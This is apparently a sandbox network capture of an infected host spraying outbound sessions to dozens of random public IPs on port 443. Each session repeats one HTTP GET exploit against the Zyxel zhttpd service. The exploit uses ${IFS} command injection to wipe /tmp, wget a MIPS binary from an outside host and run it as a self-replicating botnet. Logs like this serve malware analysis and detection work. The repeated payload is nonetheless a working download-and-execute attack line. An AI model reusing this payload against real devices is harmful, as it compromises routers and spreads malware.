                                        Mar 31, 2024 09:22:29.708065033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8291192.168.2.2360448115.91.202.86443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.708112955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8292192.168.2.2334106103.101.32.171443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.708161116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8293192.168.2.2335198138.203.44.116443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.708189964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8294192.168.2.235932284.184.108.14443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.708245993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8295192.168.2.2339806171.249.239.226443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.708303928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8296192.168.2.2340170116.89.172.22443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.708345890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8297192.168.2.2335022218.230.134.128443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.708395958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8298192.168.2.234714636.84.195.120443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.708440065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8299192.168.2.23462828.111.212.157443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.708498955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8300192.168.2.2360768201.76.23.15443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.708534956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8301192.168.2.2343054136.60.167.10443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.708574057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8302192.168.2.2345460221.218.15.246443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.708614111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8303192.168.2.234888894.153.43.108443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.708653927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8304192.168.2.236071042.115.198.72443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.708705902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8305192.168.2.235028642.82.211.226443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.708750010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8306192.168.2.2336282187.112.224.61443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.708808899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8307192.168.2.2346410160.251.38.68443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.708847046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8308192.168.2.2350112111.44.220.247443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.708892107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8309192.168.2.2344166208.84.109.222443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.708944082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8310192.168.2.234265249.67.28.198443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.708982944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8311192.168.2.2339936143.169.140.219443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.709037066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8312192.168.2.2334670123.108.61.4443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.709074020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8313192.168.2.234898271.44.53.140443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.709125042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8314192.168.2.2335130176.89.137.59443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.709152937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8315192.168.2.2344230153.66.172.110443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.709197044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8316192.168.2.234033699.70.2.184443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.709248066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8317192.168.2.2334872133.21.187.69443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.709284067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8318192.168.2.234956660.238.3.232443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.709333897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8319192.168.2.2360552185.89.218.66443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.709378004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8320192.168.2.2351072160.146.91.101443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.709440947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8321192.168.2.2345472112.134.35.9443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.709474087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8322192.168.2.2352626207.39.73.217443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.709517002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8323192.168.2.2349828219.98.23.179443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.709547043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8324192.168.2.235530280.153.162.59443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.709597111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8325192.168.2.2358296194.93.114.162443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.709630966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8326192.168.2.2341422176.145.48.205443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.709686995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8327192.168.2.2346280175.250.112.4443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.709741116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8328192.168.2.2354130147.22.68.74443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.709784031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8329192.168.2.233376035.72.144.159443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.709836960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8330192.168.2.2341900157.136.189.143443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.709892988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8331192.168.2.233780896.17.24.178443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.709930897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8332192.168.2.2358444176.45.123.165443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.709975958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8333192.168.2.234236434.184.64.179443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.710016966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8334192.168.2.2334998213.84.70.35443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.710072994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8335192.168.2.234718472.82.219.145443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.710113049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8336192.168.2.233838876.226.18.39443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.710161924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8337192.168.2.234006036.35.65.40443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.710215092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8338192.168.2.2346336204.0.79.231443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.710248947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8339192.168.2.2338566169.63.162.190443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.710300922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8340192.168.2.236070460.159.155.12443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.710335016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8341192.168.2.2336658169.213.101.22443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.710375071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8342192.168.2.2351020138.32.119.56443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.710419893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8343192.168.2.2360138111.123.94.56443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.710475922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8344192.168.2.2358042219.124.169.120443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.710540056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8345192.168.2.2338776200.53.152.199443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.710570097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8346192.168.2.2339336105.152.59.125443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.710609913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8347192.168.2.2336618216.148.101.25443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.710640907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8348192.168.2.2342840201.10.14.92443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.710683107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8349192.168.2.234219637.98.9.9443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.710717916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8350192.168.2.2349992135.98.230.120443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.710805893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8351192.168.2.233485037.250.128.41443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.710844994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8352192.168.2.2341342208.48.105.117443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.710917950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8353192.168.2.2352536151.43.139.229443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.710937977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8354192.168.2.235159035.213.81.143443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.710978031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8355192.168.2.2360332131.161.8.130443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.711033106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8356192.168.2.235173283.195.161.147443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.711077929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8357192.168.2.234306073.210.104.230443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.711122036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8358192.168.2.2339768193.218.244.51443
                                        TimestampBytes transferredDirectionData
